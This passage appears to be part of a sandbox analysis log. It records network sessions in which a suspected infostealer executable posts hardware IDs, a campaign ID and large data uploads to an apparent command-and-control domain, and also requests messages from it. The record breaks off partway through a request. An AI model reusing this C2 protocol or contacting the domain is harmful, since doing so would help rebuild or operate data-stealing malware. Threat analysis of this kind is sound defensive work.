--JY3GBVN15DRR3BPQ0Content-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--JY3GBVN15DRR3BPQ0Content-Disposition: form-data; name="pid"2--JY3GBVN15DRR3BPQ0Content-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-16 10:04:20 UTC	1016	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mrr02s5o7ht6cg9150uded2prj; expires=Fri, 11-Apr-2025 03:50:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YuXvXYzZ3iPc3b9NaiFXEeWRnM%2B3Yu9YKT9RsxLwMasBlSlF00TH2F0Z3L7wLzkw7h5JPYDHQuCNmqKctEMqGbRgP1KfMRc30pxjE%2FTyELWNRn%2FdGBvDfYglyKUISvjhuyQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd93bbefa41f9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2015&rtt_var=761&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16009&delivery_rate=1433480&cwnd=212&unsent_bytes=0&cid=cd19b86fdb01c075&ts=2021&x=0"
2024-12-16 10:04:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50015	104.21.50.161	443	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:20 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4FK8LKQN0LPD9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 553014 Host: tacitglibbr.biz
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: 2d 2d 34 46 4b 38 4c 4b 51 4e 30 4c 50 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 46 4b 38 4c 4b 51 4e 30 4c 50 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 46 4b 38 4c 4b 51 4e 30 4c 50 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 46 4b 38 4c 4b 51 4e 30 4c 50 Data Ascii: --4FK8LKQN0LPD9Content-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--4FK8LKQN0LPD9Content-Disposition: form-data; name="pid"1--4FK8LKQN0LPD9Content-Disposition: form-data; name="lid"PsFKDg--pablo--4FK8LKQN0LP
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: 1e 3a 78 d3 b7 31 bc 66 9a 02 f0 f9 2d 5f f0 27 cb 9d f5 06 a6 6c 6a 31 d7 d6 1f 86 cf 4a f5 37 49 ad bc 9b 6a 96 1b fb 66 40 52 9a c1 7d 29 d4 50 84 b7 84 16 3f f4 5a 68 fe 53 db 3f 86 b1 c6 c8 58 d5 e4 20 0c b2 7c 4e 66 12 d2 03 21 c9 ad 39 6d d7 f8 44 d1 fd 86 c6 0f 8d df 87 4c 46 91 95 ef 39 d8 42 79 06 08 75 85 af 46 2d 43 be c4 f8 84 a0 b9 d5 c2 55 f7 12 68 ca b9 e0 a9 e5 1f fa cc 1b 0d 4d 33 e8 1a 7c ae 27 74 57 fd 07 be 2f f6 98 52 31 2e 2d 3c a0 c4 de 43 50 20 58 0a bf 79 6d d2 3a 51 80 b2 34 a9 f6 3d 29 2c ea c2 56 74 f0 89 c8 fd 74 af 3f 64 ca da da 5c 50 a1 2b 38 32 b8 aa c8 e8 bb 63 8f 04 c7 91 e4 c3 38 ff 44 c8 dd 01 d4 92 9b 21 38 88 3b 26 31 4a f1 67 6f 28 01 da 11 14 ec e3 16 fe ce 6f bc f2 a9 26 38 21 b1 f5 d2 67 2c d9 a1 e5 93 0e 28 1e Data Ascii: :x1f-_'lj1J7Ijf@R})P?ZhS?X \|Nf!9mDLF9ByuF-CUhM3\|'tW/R1.-<CP Xym:Q4=),Vtt?d\P+82c8D!8;&1Jgo(o&8!g,(
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: 56 58 02 55 9b 6f 98 8e 4b 4b 25 9e 08 73 de f3 4c b8 35 4b c3 3b 3b b6 ee 59 7a 4c 1d 65 40 d2 db 8b ab a2 24 74 ed 38 39 11 f5 56 b2 30 10 fd 69 98 12 17 1d 47 c1 ed 6e 43 dd b9 2d ea 13 ca 27 e6 91 22 e3 10 e1 66 73 02 2b 0c f1 fd 69 5c 70 45 b8 11 e5 9f 38 87 78 19 a0 a4 5c ca bf 50 db 11 8c d0 17 9c ad cd 60 48 6c ad ea 1b cf 28 fd 1e ad 32 1e ab ad 50 9e ea 4d 50 c1 67 c7 45 60 4a b7 dd da 88 f5 cc 4a 76 c6 60 d6 b7 82 54 53 85 b9 45 c1 23 2d 91 2c f7 85 df 38 e1 23 91 96 76 13 39 15 6d da 71 6b 9c 26 96 7b 41 d3 0c df 5c f3 b8 f1 d5 3b e1 a1 cd f5 23 eb be a6 b4 00 d1 36 b9 d4 88 3b bd ab 5a e4 af be c4 36 c3 8e 70 59 e6 b9 9a 3c 44 3b 6e 42 32 53 da 47 b0 fa 54 5b 16 ba 2b 24 7e c6 01 60 08 09 1f 85 e3 61 32 e6 e8 4b 1b dd 5c 1a 94 fc ee 8e a4 d4 Data Ascii: VXUoKK%sL5K;;YzLe@$t89V0iGnC-'"fs+i\pE8x\P`Hl(2PMPgE`JJv`TSE#-,8#v9mqk&{A\;#6;Z6pY<D;nB2SGT[+$~`a2K\
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: 8c ff 7b 67 2b c4 d0 8b 0e ea 7b 3e c7 ff 23 84 d0 01 e6 d4 91 9f 51 d8 2a c0 83 73 78 3b 0c e0 dd 39 e4 b1 74 67 72 f6 ff 3d 3b fc 14 e8 3a 83 b4 60 18 b9 69 40 ef 4e bf 0a ac dd f1 0d ed 7c 20 7e d6 bb 43 a7 2f d2 ad 58 ec e5 ab f4 80 16 0b 34 f9 1f d8 43 38 4e 02 de e3 12 56 aa 0a a4 ce 8b 32 3a ff 3c a1 33 b6 0f c3 8e 04 9b 62 9c df 69 9b 26 3c e0 e1 43 99 46 ea e4 fa e1 08 ea 7f 7f fc a6 14 ce ff 93 13 21 c6 77 33 c9 0c 76 08 04 82 64 c6 af 40 55 46 59 29 3d e9 06 a9 02 35 7d 91 fa 4d 80 91 2e 21 8e 86 93 1f c7 11 38 d1 25 62 2b bf ad c2 8f 7a f4 f1 7e c5 39 52 1b 77 35 e3 f7 34 2b af d4 69 65 29 26 8e 24 b9 a4 a3 c3 fb 4c 0f 56 a2 d9 d9 f8 b5 15 c7 35 61 81 dd 82 f9 05 64 3d ac 78 c7 cf 31 70 a4 99 a2 88 50 2d f6 4f 5a f5 b3 75 b9 c1 2c d5 3a 70 3f Data Ascii: {g+{>#Q*sx;9tgr=;:`i@N\| ~C/X4C8NV2:<3bi&<CF!w3vd@UFY)=5}M.!8%b+z~9Rw54+ie)&$LV5ad=x1pP-OZu,:p?
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: b2 5a 33 39 7b 89 5c b5 e9 b7 a6 8f c7 4f 1c e7 bc 3b 3f c7 27 85 3f 80 a7 23 78 95 85 73 7d 1b de 1c 76 23 0d c9 49 7c ec 86 78 d3 64 a6 d1 07 85 ba ea c5 91 ce 8a 40 c9 df 67 94 19 0a 22 af 00 1d cf f1 d3 ce 8c 0e eb d0 f0 80 90 97 1c 13 82 38 de 40 89 89 2d be 41 46 91 43 71 2c 61 bf 9d 71 04 f2 63 c7 e5 ed 8e 11 93 0a 0c 64 85 f6 ed 39 c7 72 3f 75 c2 4b 4c 47 6c fb e7 f2 49 4d cc 7d b9 d0 3b ff 4e 27 b9 cf cc 90 d2 d6 24 37 13 bd f1 fb c0 b9 0f 4e 4d c6 9d 07 c1 cb c3 49 9e 7c 9c a5 3e 58 5b fb 34 a2 15 71 4d 21 d8 30 ed 8b 72 7f 37 84 68 71 4e 1d 1f 54 0c bd fc ef 2d a8 c2 c2 e7 e2 42 d6 59 97 40 5c 29 c4 20 c0 5f 03 31 96 10 48 9d 63 14 da 64 5e 90 d0 35 fa 01 65 d6 7e 98 d9 1c 45 91 b7 3e b6 3f 9e 69 c9 45 98 fb 8b 76 25 8b f1 8c c7 f7 3d 46 7c 87 Data Ascii: Z39{\O;?'?#xs}v#I\|xd@g"8@-AFCq,aqcd9r?uKLGlIM};N'$7NMI\|>X[4qM!0r7hqNT-BY@\) _1Hcd^5e~E>?iEv%=F\|
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: 60 da d6 5b ea 40 aa 9b 40 0a 75 68 a3 09 0d 0f 73 42 dc ce e6 af 73 66 ab 13 4a 8d d8 dd 52 a8 57 1a ac 76 ec 44 0f ac 68 d5 03 af 19 fe be 42 c2 11 c0 02 6b f9 0f 81 f5 05 7e 4d 7e 70 04 51 48 01 3a 6d 0b fc 39 19 b5 24 6d 4e 0c 2b a3 82 2b 06 aa de 79 fb ac 0c 7d 56 db 9a 67 8f fd e7 ad c0 11 06 ce 61 67 b0 20 96 17 68 2e b4 30 f9 8b ff 1c c7 a1 78 5e 68 d9 7d 8e 19 b2 ff 2a a4 5b 23 9d 32 2d a8 12 15 d1 9b bd 19 21 af 8a 90 66 d6 37 9f 24 47 4c 99 0b be ab d0 34 19 d0 f1 28 89 3c 44 5e f3 ec d0 9b ff 50 70 c0 c4 ef 37 ce 48 0f 2b 01 54 b0 51 a6 00 be 62 ad 8e 86 62 31 60 eb a9 b4 8e 0a c8 25 f8 da 69 42 1f 69 70 eb 65 88 61 29 b7 13 27 c2 60 a6 78 d7 ed 99 17 e3 a9 9b d1 f0 49 90 4c 50 f7 e1 c9 8c 20 87 98 b9 2a 0e 33 e2 31 b1 1d c7 be e4 1d a9 be 71 Data Ascii: `[@@uhsBsfJRWvDhBk~M~pQH:m9$mN++y}Vgag h.0x^h}[#2-!f7$GL4(<D^Pp7H+TQbb1`%iBipea)'`xILP 31q
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: 59 b1 d6 f5 33 e7 88 0a cf c8 f9 b8 63 db 2d 1e 6b e5 09 fc 19 ed 32 55 85 2e ff b7 0f cd 88 d1 b0 1c ff 55 9c 56 2d 21 e3 0f 9f df e9 5a c0 56 95 40 75 e1 9e 04 6a fd 38 61 93 79 34 ea bd b8 d6 38 f8 96 7a 22 2d 44 22 53 79 02 61 c7 a4 d8 87 ff e1 cb 53 64 91 10 ec 93 e7 ca 7e f7 07 37 df cb af 99 b5 d3 e6 e9 73 d3 2a 4b 30 62 87 e1 5e 4f be 93 14 71 74 52 0b 45 bb b7 d5 26 36 1a f6 1b 7d 53 af 39 de 9b 9d dd 56 02 59 3b 88 f0 53 f8 37 24 f0 57 1d 62 ff 0c 12 a5 60 3c e2 6d 4b db 21 9c 9a c2 c9 4b 0d ef 8c 51 5d 65 45 f7 14 72 12 35 c7 39 ae 2f 93 f0 56 f7 48 b3 86 7e d8 eb e7 64 68 89 de 09 70 5b 29 4b 60 aa 73 aa c0 1f b5 b7 cc 75 d0 a6 c5 24 cf bc dd 00 21 09 de 06 27 2e 23 2f ee 7b 51 98 08 e3 49 56 2e e9 e8 60 f8 96 0a 33 c7 87 5c 79 34 56 d9 91 da Data Ascii: Y3c-k2U.UV-!ZV@uj8ay48z"-D"SyaSd~7s*K0b^OqtRE&6}S9VY;S7$Wb`<mK!KQ]eEr59/VH~dhp[)K`su$!'.#/{QIV.`3\y4V
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: b6 41 79 90 a7 11 ac f1 d6 58 7d 56 89 50 82 84 7f 21 eb 5f 5c 4f aa 56 42 63 9b dd db c5 ca f7 9e 73 48 af c4 f8 06 12 c8 84 86 32 2d 0a f6 d2 0d c2 40 8c b6 21 5e a8 61 c4 38 c4 b7 c3 fd e2 43 ec a5 3a 03 79 7c 31 ea 4a 3a e1 ee 61 b3 16 ef 4b 0f 08 99 4e 7e ec df 74 cb ec 1a e0 17 45 d5 fe f7 64 bc 38 38 24 f9 68 b7 df a0 70 31 70 77 7c ab 08 66 e5 10 13 a4 fc 00 8e 2f fa d4 17 75 da e9 e3 a4 af 34 67 4d 51 fa 52 63 74 13 12 35 90 56 0c 0a 87 f8 10 01 8a 50 6b 4f bf 45 b8 a1 f5 6a 8b a5 d4 39 5d 7c 7b 04 2d c0 bb 50 02 3c 85 89 ef 2e 08 93 72 1f 61 17 83 d6 fa 8f c4 18 fa 83 9d 29 91 be e7 4d 18 85 ef 52 97 ac 76 0e ca 17 1d 6e 40 90 9e a0 61 29 84 98 cc db 13 5a 3f a5 3c ce eb af 42 36 ac 8f 98 c0 0c a7 c9 98 d3 c1 cd 42 e9 d3 6d 19 b3 5c af a7 bc b2 Data Ascii: AyX}VP!_\OVBcsH2-@!^a8C:y\|1J:aKN~tEd88$hp1pw\|f/u4gMQRct5VPkOEj9]\|{-P<.ra)MRvn@a)Z?<B6Bm\
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: 02 32 58 89 0a d3 1e e4 07 d1 4c 95 3b b5 b4 60 e6 23 1c 7e 52 a5 dd 7e a1 1a 55 56 cf 5a 0c e6 e7 21 f1 10 92 bd 47 41 98 61 ad 9f fb 82 e8 87 fa ad 32 f4 c3 7b 38 93 22 8e a7 76 5a 7b 0b 5c e4 c8 66 e3 89 78 85 01 d6 58 50 81 97 59 4c 5c f4 ad 0a eb 2e d5 c1 56 f8 f7 8a f8 be d8 0d b1 9b dd 2c 55 de a0 4a b5 e8 ef 4d 66 dc e6 fc 87 d6 63 c3 0f dd a3 42 9c 08 f5 fb fb 47 94 56 99 ca e1 09 21 6a 21 43 65 51 08 fa ee f4 f8 30 50 16 c6 f7 02 5e 93 9e e3 a7 3d 58 5e ff 35 0c 9b ff f6 2e ef 02 b8 89 d4 9f c7 85 c0 b1 f7 f6 66 c4 e7 c5 48 f7 a6 0f 15 86 bf 6b e2 05 0a be 65 33 26 0e 17 8c 72 c3 27 0f e8 51 27 c7 3c 8e 3f a9 25 03 3d b1 69 80 70 bf 54 50 06 15 54 54 63 e9 51 c8 02 68 21 33 b9 0b a0 b4 fb f1 f5 ba b0 ff 43 77 a6 fa 8f d8 7c be ab d1 4e 3f 0a 0e Data Ascii: 2XL;`#~R~UVZ!GAa2{8"vZ{\fxXPYL\.V,UJMfcBGV!j!CeQ0P^=X^5.fHke3&r'Q'<?%=ipTPTTcQh!3Cw\|N?
2024-12-16 10:04:20 UTC	15331	OUT	Data Raw: 04 f3 c9 b1 34 7c 8a 8f 8b 83 b8 ec d5 a6 c2 0c bd f8 10 fe 43 5c 0c 4a 16 52 5f 10 2b 92 35 8e 98 4b e1 25 54 7e 9a c4 bf 69 91 ac 37 0a 22 b4 4a c3 7b 1f ae b9 26 98 4a 81 5e 93 0a 94 46 88 83 6c 04 a1 f7 e6 1e 56 72 eb 8f 4f a9 16 c6 07 d6 a7 1e 25 e1 35 84 db df e1 81 71 d2 e6 f9 09 fe fb e4 8f 3c 1b 50 7d a0 45 e0 7d a1 4e a8 f7 bc e2 a5 af 71 91 74 5b e6 42 84 fb c0 84 a9 de e7 60 9a 26 ba c6 c8 b8 4b 17 84 ce ff 9c ce 30 1a 88 fa a4 cd 71 1d 6f 59 b7 69 d9 ec e0 1b 8d 69 15 44 f8 f4 90 7e e0 02 ef 5f 33 7e bd 85 68 6c 42 7f 2c 61 b3 a8 72 a2 de 7d 20 99 37 23 ce fa d5 93 5c f9 66 70 f3 79 e5 fa 80 4d 39 ed 26 eb d7 9c 42 01 6d 91 15 c4 3d 27 0a d1 16 87 08 01 a4 cc b0 0f 95 9b 05 63 ae 3e 8c 10 ee 50 b3 78 50 35 36 a2 7a 05 4f 1d d8 30 66 6f 24 08 Data Ascii: 4\|C\JR_+5K%T~i7"J{&J^FlVrO%5q<P}E}Nqt[B`&K0qoYiiD~_3~hlB,ar} 7#\fpyM9&Bm='c>PxP56zO0fo$
2024-12-16 10:04:24 UTC	1019	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bn1ke3md614ij86jmuklqnp7od; expires=Fri, 11-Apr-2025 03:51:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YS788uGTTgd%2BuIM8eeV%2F4gc3wbrFttGQNkP9eX8JuLXIvW9jUULHSkDQLyOnK2sFlGsDAbTRBJYKldQINFiwd%2Fpb6kkvPmcluJGlIQq8137ZF2h9sWxiAwkIZd2Nsepthdc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd943393a8ccd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=682&sent=340&recv=575&lost=0&retrans=0&sent_bytes=2840&recv_bytes=555511&delivery_rate=1590413&cwnd=195&unsent_bytes=0&cid=710d73f922c2f5c9&ts=3855&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50032	104.21.50.161	443	2876	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:25 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LJYMGJJ9XR3SKCVS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20555 Host: tacitglibbr.biz
2024-12-16 10:04:25 UTC	15331	OUT	Data Raw: 2d 2d 4c 4a 59 4d 47 4a 4a 39 58 52 33 53 4b 43 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 4a 59 4d 47 4a 4a 39 58 52 33 53 4b 43 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 4a 59 4d 47 4a 4a 39 58 52 33 53 4b 43 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4c 4a Data Ascii: --LJYMGJJ9XR3SKCVSContent-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--LJYMGJJ9XR3SKCVSContent-Disposition: form-data; name="pid"3--LJYMGJJ9XR3SKCVSContent-Disposition: form-data; name="lid"PsFKDg--pablo--LJ
2024-12-16 10:04:25 UTC	5224	OUT	Data Raw: 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`i
2024-12-16 10:04:26 UTC	1012	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qqg7htpn1b3tirq0man7oo4n48; expires=Fri, 11-Apr-2025 03:51:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HrrAJRwmDcdAU2sEuGI6AvivVdlC96J19MPUpyRTutXYLestFWPiodtay8pskvFu3A9xPZaF7WosmcW%2FQk8DBns5pk0BcmMGetciULbBbzHW0DqYEJxiO6pbGvRagYwb5Hg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd961cfa080d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1475&rtt_var=566&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21514&delivery_rate=1910994&cwnd=208&unsent_bytes=0&cid=86d49baa08883ac5&ts=1595&x=0"
2024-12-16 10:04:26 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50041	104.21.50.161	443	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:26 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: tacitglibbr.biz
2024-12-16 10:04:26 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=1DB2EE5486F2277BAC8923850305D13E
2024-12-16 10:04:27 UTC	1009	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3fv1b4j4e1vvep32puaakpra2b; expires=Fri, 11-Apr-2025 03:51:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXpC0Fqb1WzQV4ctivRrhzZVl2tpSBNuUkQFOkFT7OLOoFVFId9sH4LRchkRlgVe%2BEri9mpHJXk5BLF8FVNrK6CIQ0cdS0zVNDcgRghlgJwNaVpoawqsveXvxZloyeIq%2BCI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd96dee770cbe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1479&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=981&delivery_rate=1912246&cwnd=166&unsent_bytes=0&cid=9c031990f5cc3dd1&ts=823&x=0"
2024-12-16 10:04:27 UTC	214	IN	Data Raw: 64 30 0d 0a 6b 6e 7a 65 70 4c 46 79 53 6f 58 51 6e 33 2f 74 69 69 41 6d 51 69 72 5a 67 57 6f 35 4b 36 4d 47 61 54 6a 46 59 57 48 72 4d 4e 2f 4a 42 2f 7a 52 6b 30 68 6f 37 61 54 72 44 39 66 57 44 33 70 74 47 2b 47 30 52 41 73 61 6c 69 68 59 43 66 5a 50 55 4e 31 73 38 50 30 61 75 50 69 65 46 69 2f 6a 2f 76 6f 48 69 4b 67 4d 42 43 52 65 2b 37 74 61 46 51 6e 47 4a 46 4d 49 75 45 30 61 79 55 58 39 71 46 36 32 30 4d 55 43 63 4e 6e 2f 77 31 44 63 73 68 55 49 63 42 76 73 72 31 73 49 47 49 30 33 58 32 54 71 45 68 57 4f 55 62 4c 4f 55 36 7a 46 33 78 59 6c 36 50 37 36 42 34 69 6f 44 41 51 6b 58 76 75 37 57 68 55 4a 78 69 52 54 43 4c 67 38 0d 0a Data Ascii: d0knzepLFySoXQn3/tiiAmQirZgWo5K6MGaTjFYWHrMN/JB/zRk0ho7aTrD9fWD3ptG+G0RAsalihYCfZPUN1s8P0auPieFi/j/voHiKgMBCRe+7taFQnGJFMIuE0ayUX9qF620MUCcNn/w1DcshUIcBvsr1sIGI03X2TqEhWOUbLOU6zF3xYl6P76B4ioDAQkXvu7WhUJxiRTCLg8
2024-12-16 10:04:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50063	104.21.50.161	443	2876	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:30 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=O6PDASSKP6S07 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1302 Host: tacitglibbr.biz
2024-12-16 10:04:30 UTC	1302	OUT	Data Raw: 2d 2d 4f 36 50 44 41 53 53 4b 50 36 53 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 36 50 44 41 53 53 4b 50 36 53 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 36 50 44 41 53 53 4b 50 36 53 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 36 50 44 41 53 53 4b 50 36 53 Data Ascii: --O6PDASSKP6S07Content-Disposition: form-data; 